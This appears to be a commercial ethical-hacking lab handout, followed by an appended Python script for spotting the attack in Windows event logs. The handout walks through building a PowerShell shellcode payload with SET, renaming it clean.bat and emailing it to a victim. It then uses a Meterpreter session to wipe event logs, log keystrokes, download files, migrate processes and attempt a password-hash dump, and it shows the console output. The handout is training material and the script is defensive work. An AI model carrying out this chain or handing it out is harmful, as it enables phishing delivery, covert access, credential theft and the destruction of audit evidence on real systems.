
NEXUS EDUCATION SERVICES

📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net

This is the intellectual property of Nexus Education Services. Reproduction or distribution without consent will be prosecuted in a court of law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other Purposes], otherwise known as the Intellectual Property Code of the Philippines.

Social Engineering Penetration Testing using PowerShell Attack

As a responsible ethical hacker, security engineer or penetration tester you should be familiar with the tools used to perform penetration testing.

HANDS-ON LAB:

Lab Objectives:

Lab Duration:
▪ Time: 45 minutes

Lab Environment
▪ You need internet connection

Lab Tasks

Tools

Step-by-Step Instructions

Open a new terminal and run SET:


setoolkit
1) Social-Engineering Attacks

9) Powershell Attack Vectors

1) Powershell Alphanumeric Shellcode Injector

Enter the IP of Kali: 192.168.145.130

Accept the default port 443 and press Enter

Type yes

! Open a new terminal and look for the PowerShell injection file

ls /root/.set/reports/powershell and you will see a file called x86_powershell_injection.txt

cp /root/.set/reports/powershell/x86_powershell_injection.txt ~/Desktop

Rename x86_powershell_injection.txt to clean.bat and send it to the victim via email

! I have copied the file already to the Windows Server 2012 desktop; just run clean.bat

Go back to Kali, where the Meterpreter handler is open, and type sessions -i 1

msf5 exploit(multi/handler) > sessions -i 1


[*] Starting interaction with 1...

Type sysinfo

meterpreter > sysinfo


Computer : NEXUSSERVER
OS : Windows 2012 R2 (Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows

Type ? to see all available commands

Go to Windows and run eventvwr; check that the Windows logs contain thousands of event records, which are about to disappear.

Go back to Kali and type clearev

meterpreter > clearev


[*] Wiping 1612 records from Application...
[*] Wiping 3201 records from System...
[*] Wiping 9106 records from Security...

execute -f calc

! Start capturing keystrokes


keyscan_start

! Dump the keystroke buffer and you will see all the keystrokes from Server 2012
keyscan_dump

! Stop keylogger
keyscan_stop

! Go to the Windows directory and you will see that you have gained access to the Windows server's C: drive
cd c:\windows
pwd
ls

! Download a file from the victim's PC to your Kali


pwd
cd C:\Users\Administrator\pictures
download cat.jpg

meterpreter > shell


Process 452 created.


Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

meterpreter > execute -f cmd.exe -i -H


Process 3708 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Downloads>ps

meterpreter > run post/windows/manage/migrate

[*] Running module against NEXUSSERVER


[*] Current server process: powershell.exe (2844)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 4068
[+] Successfully migrated to process 4068

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...


[*] Calculating the hboot key using SYSKEY f93580f87e94025a7a009eb1886569f1...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)

Result of penetration testing: by now you should know how an attacker sends a keylogger and gathers the username and password used for a remote connection to gain root access.

Question: As a Nexus Ethical Hacker, what should you do to protect your company from a PowerShell attack?
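One answer to the question above, on the detection side, is to look for the traces this lab leaves in the Windows event logs. The script below is an added example, not part of the Nexus handout: it runs over exported Windows event records and flags the two artefacts of the chain, the cleared event logs that clearev produces (Security event 1102 and System event 104, which are real Windows event IDs) and the process-creation record (Security event 4688) of a PowerShell launched with a hidden window and an encoded command. The flattened field names (channel, event_id, command_line, parent_process, subject_user, cleared_log) are an assumed export format, and the sample records, including the encoded script, are constructed for this example.

```python
"""Triage exported Windows event records for artefacts of the PowerShell attack
chain above: wiped event logs and a hidden, encoded PowerShell launch.
Added example, not part of the Nexus handout. Field names are an assumed
flattened export format; the sample records below are constructed."""
import base64
import re
from typing import Optional

# Real Windows event IDs: 1102 = Security log cleared, 104 = a log cleared
# (written to System), 4688 = new process created (needs command-line auditing).
LOG_CLEARED = {("Security", 1102), ("System", 104)}
PROCESS_CREATED = ("Security", 4688)

# PowerShell accepts any unique prefix of a parameter name, so match the
# abbreviations too: -enc/-e/-ec (EncodedCommand), -w hidden (WindowStyle), -nop (NoProfile).
ENCODED_RE = re.compile(
    r"(?:^|\s)[-/](?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_RE = re.compile(r"(?:^|\s)[-/]w(?:in|indowstyle)?\s+hidden", re.I)
NOPROFILE_RE = re.compile(r"(?:^|\s)[-/]nop(?:rofile)?(?:\s|$)", re.I)
PAYLOAD_WORDS = ("iex", "invoke-expression", "frombase64string", "downloadstring", "virtualalloc")


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; return it, or None if it is not that."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_powershell(command_line: str) -> tuple:
    """Return (score, reasons) for one process command line; 0 if it is not PowerShell."""
    reasons = []
    if "powershell" not in command_line.lower():
        return 0, reasons
    if HIDDEN_RE.search(command_line):
        reasons.append("hidden window")
    if NOPROFILE_RE.search(command_line):
        reasons.append("no profile")
    match = ENCODED_RE.search(command_line)
    if match:
        reasons.append("encoded command")
        decoded = decode_encoded_command(match.group(1))
        if decoded is not None:
            hits = [w for w in PAYLOAD_WORDS if w in decoded.lower()]
            if hits:
                reasons.append("decoded script mentions " + ", ".join(hits))
    return len(reasons), reasons


def triage(events: list, threshold: int = 2) -> dict:
    """Collect log-clearing events and PowerShell launches scoring at or above threshold."""
    findings = {"log_cleared": [], "suspicious_powershell": []}
    for ev in events:
        key = (ev["channel"], ev["event_id"])
        if key in LOG_CLEARED:
            findings["log_cleared"].append({
                "computer": ev["computer"],
                "log": ev.get("cleared_log", ev["channel"]),
                "by": ev.get("subject_user", "unknown"),
            })
        elif key == PROCESS_CREATED:
            score, reasons = score_powershell(ev.get("command_line", ""))
            if score >= threshold:
                findings["suspicious_powershell"].append({
                    "computer": ev["computer"],
                    "parent": ev.get("parent_process", "unknown"),
                    "score": score,
                    "reasons": reasons,
                })
    return findings


# Constructed sample: a benign placeholder script stands in for the real stager.
_SAMPLE_SCRIPT = "IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBCAA==')))"
_SAMPLE_B64 = base64.b64encode(_SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"channel": "Security", "event_id": 4688, "computer": "NEXUSSERVER", "parent_process": "explorer.exe",
     "command_line": r"cmd.exe /c C:\Users\Administrator\Desktop\clean.bat"},
    {"channel": "Security", "event_id": 4688, "computer": "NEXUSSERVER", "parent_process": "cmd.exe",
     "command_line": "powershell -nop -w hidden -enc " + _SAMPLE_B64},
    {"channel": "Security", "event_id": 4688, "computer": "NEXUSSERVER", "parent_process": "taskeng.exe",
     "command_line": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\nightly-backup.ps1"},
    {"channel": "Security", "event_id": 1102, "computer": "NEXUSSERVER", "subject_user": "Administrator"},
    {"channel": "System", "event_id": 104, "computer": "NEXUSSERVER", "subject_user": "Administrator",
     "cleared_log": "Application"},
    {"channel": "System", "event_id": 104, "computer": "NEXUSSERVER", "subject_user": "Administrator",
     "cleared_log": "System"},
]

if __name__ == "__main__":
    for kind, items in triage(SAMPLE_EVENTS).items():
        print(kind)
        for item in items:
            print("  ", item)
```

Two points follow from the design. Event 4688 carries the command line only when the "Include command line in process creation events" audit policy is on; with PowerShell script block logging enabled, event 4104 in the Microsoft-Windows-PowerShell/Operational log records the decoded script directly and is the more robust source. And the clearev step defeats itself on a monitored host: the 1102 clear-event is written immediately after the wipe, so a Security log whose oldest record is a 1102 is the signature, which is why forwarding events to a collector the compromised host cannot erase is the mitigation that matters.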
